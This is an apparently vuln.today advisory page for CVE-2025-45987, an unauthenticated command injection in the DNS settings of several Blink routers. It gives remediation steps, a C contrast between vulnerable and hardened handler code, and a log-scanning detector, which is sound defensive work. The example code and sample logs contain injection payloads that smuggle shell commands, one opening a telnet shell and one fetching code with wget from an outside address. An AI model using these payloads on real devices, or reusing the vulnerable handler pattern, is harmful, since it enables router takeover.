CVE-2025-45987

EUVD-2025-18262 | CRITICAL
Published 2025-06-13
CVSS 3.1 base score 9.8

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Lifecycle Timeline

Analysis Generated: Mar 14, 2026 21:34 (vuln.today)
EUVD ID Assigned: Mar 14, 2026 21:34 (euvd) - EUVD-2025-18262
PoC Detected: Jul 10, 2025 12:16 (vuln.today) - public exploit code
CVE Published: Jun 13, 2025 12:15 (nvd) - CRITICAL 9.8

Description

Blink routers BL-WR9000 V2.4.9, BL-AC2100_AZ3 V1.0.4, BL-X10_AC8 v1.0.5, BL-LTE300 v1.2.3, BL-F1200_AT1 v1.0.0, BL-X26_AC8 v1.2.8, BLAC450M_AE4 v4.0.0 and BL-X26_DA3 v1.2.7 were discovered to contain multiple command injection vulnerabilities via the dns1 and dns2 parameters in the bs_SetDNSInfo function.

Analysis

Multiple Blink router models (eight firmware versions across several product lines) contain unauthenticated command injection vulnerabilities in the DNS configuration handler (bs_SetDNSInfo), allowing remote attackers to execute arbitrary system commands without authenticating. The CVSS 9.8 rating follows directly from the vector: network-exploitable (AV:N), low complexity (AC:L), no privileges (PR:N) and no user interaction (UI:N) required, and high impact on confidentiality, integrity and availability. The priority score on this page records no KEV listing (KEV: 0), but the timeline records public exploit code detected on Jul 10, 2025. Network reachability, no authentication requirement and available exploit code together make this a high-priority issue for every owner of an affected model.

Technical Context

The vulnerability resides in the bs_SetDNSInfo function, which processes the DNS configuration parameters dns1 and dns2 without validating or sanitizing them. This is a classic CWE-77 (Improper Neutralization of Special Elements used in a Command) case: user-supplied input is concatenated into a shell command line, so a value consisting of a valid address followed by a shell separator and a second command gets executed by the router with the privileges of the web server process (the high C/I/A ratings indicate full device compromise). The affected routers span several product lines (BL-WR9000, BL-AC2100, BL-X10, BL-LTE300, BL-F1200, BL-X26 variants) and hardware revisions, suggesting a common vulnerable codebase shared across Blink's router firmware. No CPE entries are recorded for this CVE on this page. The dns1/dns2 parameters are reached through the router's web interface or its API endpoints and, per the CVSS vector (PR:N), require no authentication: an attacker on the LAN can exploit this directly, and an attacker anywhere on the internet can if the management interface or remote administration is exposed on the WAN side (AV:N).
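The following is an added illustration, not Blink's firmware (which is not reproduced on this page): the shape of a bs_SetDNSInfo-style handler that formats dns1/dns2 straight into a shell command, beside a hardened version that checks both values against a strict IPv4 allow-list and renders the file contents with no shell involved. The function names, the resolv.conf target and the echo command line are assumptions made for the example.

```c
/* Added illustration, not Blink firmware: a bs_SetDNSInfo-style handler
 * that splices dns1/dns2 into a shell command, beside a hardened version.
 * Function names, the echo command and the target path are assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern (CWE-77): attacker-controlled dns1/dns2 are formatted
 * straight into a command line that the firmware would hand to system().
 * This version only builds the string so it can be inspected safely. */
int build_dns_cmd_vulnerable(const char *dns1, const char *dns2,
                             char *out, size_t outlen)
{
    int n = snprintf(out, outlen,
                     "echo \"nameserver %s\nnameserver %s\" > /etc/resolv.conf",
                     dns1, dns2);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Strict allow-list: exactly four decimal octets 0-255 separated by dots,
 * at most three digits each, nothing else. Shell metacharacters,
 * whitespace and newlines all fail this test. */
int is_ipv4_literal(const char *s)
{
    int octets = 0;
    while (*s) {
        if (!isdigit((unsigned char)*s))
            return 0;
        int value = 0, digits = 0;
        while (isdigit((unsigned char)*s)) {
            value = value * 10 + (*s - '0');
            if (++digits > 3)
                return 0;
            s++;
        }
        if (value > 255)
            return 0;
        octets++;
        if (*s == '.') {
            s++;
            if (*s == '\0')      /* trailing dot */
                return 0;
        } else if (*s != '\0') {
            return 0;            /* anything but '.' or end of string */
        }
    }
    return octets == 4;
}

/* Hardened: validate both inputs against the allow-list, then render the
 * file contents directly. The caller writes `out` with fopen/fwrite; no
 * shell is ever involved, so there is nothing left to inject into. */
int render_resolv_conf(const char *dns1, const char *dns2,
                       char *out, size_t outlen)
{
    if (!is_ipv4_literal(dns1) || !is_ipv4_literal(dns2))
        return -1;
    int n = snprintf(out, outlen, "nameserver %s\nnameserver %s\n", dns1, dns2);
    return (n < 0 || (size_t)n >= outlen) ? -2 : 0;
}

int main(void)
{
    /* Constructed payload: a second command appended to dns1. */
    const char *evil = "8.8.8.8; telnetd -l /bin/sh #";
    char buf[256];

    build_dns_cmd_vulnerable(evil, "1.1.1.1", buf, sizeof buf);
    printf("vulnerable handler would run: %s\n", buf);

    if (render_resolv_conf(evil, "1.1.1.1", buf, sizeof buf) < 0)
        printf("hardened handler rejected dns1=\"%s\"\n", evil);
    if (render_resolv_conf("8.8.8.8", "1.1.1.1", buf, sizeof buf) == 0)
        printf("hardened handler would write:\n%s", buf);
    return 0;
}
```

The fix is the combination of the two halves: an allow-list that admits only the one shape a DNS server address can take, and a code path that never hands the value to a shell at all. Escaping or blacklisting metacharacters alone is the usual way such fixes get bypassed.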

Affected Products

Eight Blink router models and firmware versions are affected:
(1) BL-WR9000 V2.4.9
(2) BL-AC2100_AZ3 V1.0.4
(3) BL-X10_AC8 v1.0.5
(4) BL-LTE300 v1.2.3
(5) BL-F1200_AT1 v1.0.0
(6) BL-X26_AC8 v1.2.8
(7) BLAC450M_AE4 v4.0.0
(8) BL-X26_DA3 v1.2.7
These span the consumer product lines (WR9000, AC2100, X10, F1200, X26, AC450M) and an LTE model (LTE300), indicating wide impact across Blink's portfolio. No CPE entries and no vendor advisory links are recorded for this CVE on this page; contact Blink support or check their security page for official statements.

Remediation

Immediate actions:
(1) Contact Blink support to obtain patched firmware for each affected model. Do not assume a fix exists until the vendor announces one; no advisory is linked from this page.
(2) If patched firmware is available, update every affected router immediately through the web interface's firmware-upgrade page or its automatic update mechanism, then confirm the running version afterwards.
(3) If no patch is available, reduce exposure in the meantime:
(a) Restrict access to the management interface to trusted hosts with firewall rules or ACLs.
(b) Disable remote (WAN-side) management and UPnP so the web interface is not reachable from the internet.
(c) Change default administrative credentials. Because the flaw requires no privileges (PR:N), strong credentials do not block exploitation on their own; this is hygiene, not a fix.
(d) Segment the router from critical assets with VLAN isolation so a compromised device cannot pivot freely.
(e) Monitor web-server and firewall logs for DNS-configuration requests whose dns1 or dns2 values contain anything other than a dotted-quad address, such as shell metacharacters (the exact endpoint path is not given on this page).
(4) For all users: check Blink's official support page and security bulletins for patched firmware versions and a deployment timeline. Do not delay: this is critical.
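The monitoring step above is easier to act on with a concrete check. The following added example (not from this page or from the vendor) scans web-server request lines for dns1/dns2 values that cannot be an IPv4 literal once URL-decoded, which is exactly the shape an injection payload must take. The /cgi-bin/setdns path and the three log lines are constructed for the example, since the real endpoint is not given on this page.

```c
/* Added example, not from the page or the vendor: flag request lines whose
 * dns1/dns2 values cannot be a plain IPv4 literal. The endpoint path and
 * the sample log lines are constructed for this example. */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed sample log lines in combined-log style (request line quoted). */
const char *const SAMPLE_REQUESTS[] = {
    "192.168.0.10 - - [10/Jul/2025:12:16:01 +0000] \"POST /cgi-bin/setdns?dns1=8.8.8.8&dns2=1.1.1.1 HTTP/1.1\" 200 -",
    "198.51.100.23 - - [10/Jul/2025:12:16:09 +0000] \"POST /cgi-bin/setdns?dns1=8.8.8.8%3Btelnetd+-l+%2Fbin%2Fsh&dns2=1.1.1.1 HTTP/1.1\" 200 -",
    "198.51.100.23 - - [10/Jul/2025:12:16:15 +0000] \"POST /cgi-bin/setdns?dns1=1.1.1.1&dns2=%60wget+http%3A%2F%2F198.51.100.23%2Fx%60 HTTP/1.1\" 200 -",
};
const size_t SAMPLE_REQUEST_COUNT = sizeof SAMPLE_REQUESTS / sizeof SAMPLE_REQUESTS[0];

/* Percent-decode `len` bytes of src into dst (dst needs len+1 bytes);
 * '+' becomes a space as in form encoding. */
static void url_decode(const char *src, size_t len, char *dst)
{
    size_t i = 0, j = 0;
    while (i < len) {
        if (src[i] == '%' && i + 2 < len
            && isxdigit((unsigned char)src[i + 1])
            && isxdigit((unsigned char)src[i + 2])) {
            char hex[3] = { src[i + 1], src[i + 2], '\0' };
            dst[j++] = (char)strtol(hex, NULL, 16);
            i += 3;
        } else if (src[i] == '+') {
            dst[j++] = ' ';
            i++;
        } else {
            dst[j++] = src[i++];
        }
    }
    dst[j] = '\0';
}

/* Locate the raw value of query parameter `name` in a request line.
 * Returns its length and sets *start, or -1 if the parameter is absent. */
static int find_param(const char *line, const char *name, const char **start)
{
    size_t nlen = strlen(name);
    const char *p = line;
    while ((p = strstr(p, name)) != NULL) {
        if ((p == line || p[-1] == '?' || p[-1] == '&') && p[nlen] == '=') {
            *start = p + nlen + 1;
            return (int)strcspn(*start, "& \"\r\n");
        }
        p += nlen;
    }
    return -1;
}

/* A legitimate dns1/dns2 value is digits and dots only; anything else
 * (';', '|', '`', '$', spaces, newlines ...) is flagged. Empty is left alone. */
static int value_is_suspicious(const char *decoded)
{
    for (const char *c = decoded; *c; c++)
        if (!isdigit((unsigned char)*c) && *c != '.')
            return 1;
    return 0;
}

/* Number of dns1/dns2 parameters in this request line that look injected (0..2). */
int scan_request_for_dns_injection(const char *line)
{
    static const char *const params[] = { "dns1", "dns2" };
    int hits = 0;
    for (size_t k = 0; k < 2; k++) {
        const char *start = NULL;
        char decoded[512];
        int len = find_param(line, params[k], &start);
        if (len < 0)
            continue;
        if ((size_t)len >= sizeof decoded) { /* oversized value: flag without decoding */
            hits++;
            continue;
        }
        url_decode(start, (size_t)len, decoded);
        if (value_is_suspicious(decoded))
            hits++;
    }
    return hits;
}

/* Count lines carrying at least one suspicious DNS parameter. */
int count_flagged(const char *const *lines, size_t n)
{
    int flagged = 0;
    for (size_t i = 0; i < n; i++)
        if (scan_request_for_dns_injection(lines[i]) > 0)
            flagged++;
    return flagged;
}

int main(void)
{
    for (size_t i = 0; i < SAMPLE_REQUEST_COUNT; i++) {
        int hits = scan_request_for_dns_injection(SAMPLE_REQUESTS[i]);
        if (hits > 0)
            printf("ALERT (%d suspicious param%s): %s\n",
                   hits, hits > 1 ? "s" : "", SAMPLE_REQUESTS[i]);
    }
    return 0;
}
```

Decoding before matching matters: a detector that greps the raw line for `;` or backticks misses `%3B` and `%60`, which is how the payload arrives on the wire. The allow-list check (digits and dots only) is deliberately broad; it will also flag hostnames and IPv6 literals, which is acceptable for a parameter that the firmware documents as taking an IPv4 address, and it avoids maintaining a metacharacter blacklist.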

Priority Score

72 (scale: Low / Medium / High / Critical)
Components: KEV 0, EPSS +3.0, CVSS +49, POC +20


CVE-2025-45987 vulnerability details – vuln.today
